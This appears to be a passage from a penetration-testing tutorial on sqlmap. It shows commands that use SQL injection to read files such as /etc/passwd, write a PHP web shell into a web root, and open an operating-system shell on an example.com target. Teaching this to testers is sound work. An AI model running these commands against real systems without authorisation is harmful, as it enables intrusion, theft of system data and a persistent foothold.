Reading Files
You're likely going to be reading files more than writing them if you use this. Writing files by default is turned off and you manually have to make changes to turn it on.
Reading files is done with the flag --file-read but let's first see if we have permissions:
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
If you get a 'true' when you run this - you're golden. If not... outta luck. If we DO then we can run this to access any file we know about:
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
Writing Files
Like we already said, this is a slim chance but it never hurts to try! So let's try writing a file using this:
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
OS Shells
Well... let's say we don't know much or we just want more control of what we're doing. Maybe we want to just look around! SQLMap has a shell upload command that might work too! There's two ways to do it.
sqlmap -u "http://www.example.com/?id=1" --os-shell
If the above works, that's great, it's nice and simple. You will get asked a few questions to try and get the shell, hopefully your enumeration has been able to fill you in on what those answers are - or you can take a chance and default it.
Sometimes this will work but you can't run any commands. If that happens we'll need to specify the type of technique used to create the shell.
sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E
This option uses the error based SQL Injection which may give better results.